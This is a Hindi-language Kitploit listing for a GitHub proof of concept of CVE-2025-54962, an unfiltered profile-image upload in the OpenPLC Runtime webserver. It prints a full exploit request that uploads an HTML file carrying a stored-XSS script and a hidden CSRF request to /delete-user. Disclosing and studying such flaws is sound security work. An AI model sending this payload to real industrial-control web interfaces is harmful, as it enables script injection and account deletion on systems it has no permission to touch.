Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54962 — प्रमाणित उपयोगकर्ता OpenPLC Runtime में प्रोफ़ाइल छवियों के रूप में मनमानी फ़ाइलें (जैसे .html, .svg) अपलोड कर सकते हैं। ये फ़ाइलें बिना प्रमाणीकरण के सार्वजनिक रूप से सुलभ हैं, जिससे संग्रहीत XSS या दुर्भावनापूर्ण सामग्री वितरण संभव हो जाता है। | Kitploit
उपकरण/GitHubGitHub/eyodav/cve-2025-54962
भेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षावेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubeyodav/cve-2025-54962

CVE-2025-54962

प्रमाणित उपयोगकर्ता OpenPLC Runtime में प्रोफ़ाइल छवियों के रूप में मनमानी फ़ाइलें (जैसे .html, .svg) अपलोड कर सकते हैं। ये फ़ाइलें बिना प्रमाणीकरण के सार्वजनिक रूप से सुलभ हैं, जिससे संग्रहीत XSS या दुर्भावनापूर्ण सामग्री वितरण संभव हो जाता है।

रिपॉजिटरी देखें
81 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 CVE-2025-54962 — OpenPLC Runtime वेबसर्वर में असुरक्षित फ़ाइल अपलोड

(OpenPLC Runtime ≤ 2024-12-31 — स्टोर्ड XSS, CSRF)

📌 सारांश

मैंने OpenPLC Runtime वेबसर्वर (रिलीज़ संस्करण: 2024-12-31) में एक कमजोरी खोजी है जो प्रमाणित उपयोगकर्ताओं को प्रोफ़ाइल चित्रों के रूप में मनमानी फ़ाइलें (जैसे .html, .svg) अपलोड करने की अनुमति देती है। ये फ़ाइलें /static/ निर्देशिका में संग्रहीत होती हैं और बिना प्रमाणीकरण के एक्सेस की जा सकती हैं, जिससे स्टोर्ड XSS या दुर्भावनापूर्ण होस्टिंग परिदृश्य संभव होते हैं।


🧪 प्रभावित घटक

  • रूट: /edit-user
  • प्रभावित: प्रोफ़ाइल चित्रों के लिए फ़ाइल अपलोड कार्यक्षमता

⚠️ प्रभाव

  • अपर्याप्त MIME और एक्सटेंशन सत्यापन के साथ मनमानी फ़ाइल अपलोड
  • स्टोर्ड XSS
  • दुर्भावनापूर्ण सामग्री होस्टिंग
  • अपलोड की गई फ़ाइलों तक बिना प्रमाणीकरण के पहुंच
  • CSRF

🎯 हमला वेक्टर

  1. प्रमाणित उपयोगकर्ता प्रोफ़ाइल चित्र के रूप में .html या .svg फ़ाइल अपलोड करता है।
  2. फ़ाइल /static/ में संग्रहीत होती है और उसे एक अनुमानित ID दी जाती है (जैसे, http://localhost:8080/static/336029.html)
  3. कोई भी उपयोगकर्ता (यहां तक कि बिना प्रमाणीकरण वाला) अपलोड की गई फ़ाइल को सीधे एक्सेस कर सकता है।
  4. यदि फ़ाइल में JavaScript या अन्य दुर्भावनापूर्ण कोड होता है, तो वह पीड़ित के ब्राउज़र में निष्पादित हो जाएगा।

📸 विज़ुअल प्रूफ ऑफ कॉन्सेप्ट

डैशबोर्ड जब PLC चल रहा हो

dashboard.png

दुर्भावनापूर्ण .html फ़ाइल अपलोड करना

choose file.png

छवि फ़िल्टर को बायपास करने के लिए "सभी फ़ाइलें" का उपयोग करना

file.png

/static/ से अपलोड की गई फ़ाइल निष्पादित हुई

poc.png


🎞️ वीडियो PoCs

  • बेसिक PoC डेमो
    poc de base.mp4

  • बिना प्रमाणीकरण के पहुंच का प्रदर्शन
    unauthenticated.mp4

  • CSRF PoC
    poc csrf.mp4


📤 Burp Suite Repeater के साथ एक्सप्लॉइट अनुरोध उदाहरण

root@kitploit:~
POST /edit-user HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 1397
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: [OpenPLC URL]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW3GoLRyFS7dyLS2B
User-Agent: [UA]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8080/edit-user?table_id=10
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=[cookie]
Connection: close

------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_id"

10
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="full_name"

OpenPLC User
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_name"

openplc
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_email"

[email protected]
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="user_password"

mypasswordishere
------WebKitFormBoundaryW3GoLRyFS7dyLS2B
Content-Disposition: form-data; name="file"; filename="poc cve.html"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
  <title>PoC – Unfiltered Upload</title>
</head>
<body>
  <h1>Proof of Concept</h1>

  <p>Payload uploaded on vulnerable endpoint. If filtering is broken, executing script below proves stored XSS.</p>

  <h2>XSS Demo (auto-executed)</h2>
  <script>alert('PoC xss')</script>

  <h2>CSRF</h2>
  <img src="http://127.0.0.1:8080/delete-user?user_id=%5BUser%20ID%5D" style="display:none" />

  <h2>document.domain</h2>
  <p>Opened from: <script>document.write(document.domain)</script></p>

  <h2>Manual link to malicious HTML</h2>
  <a href="https://google.com/" target="_blank">Click to redirect on google.com</a>
</body>
</html>

------WebKitFormBoundaryW3GoLRyFS7dyLS2B--
टूल डाउनलोड करें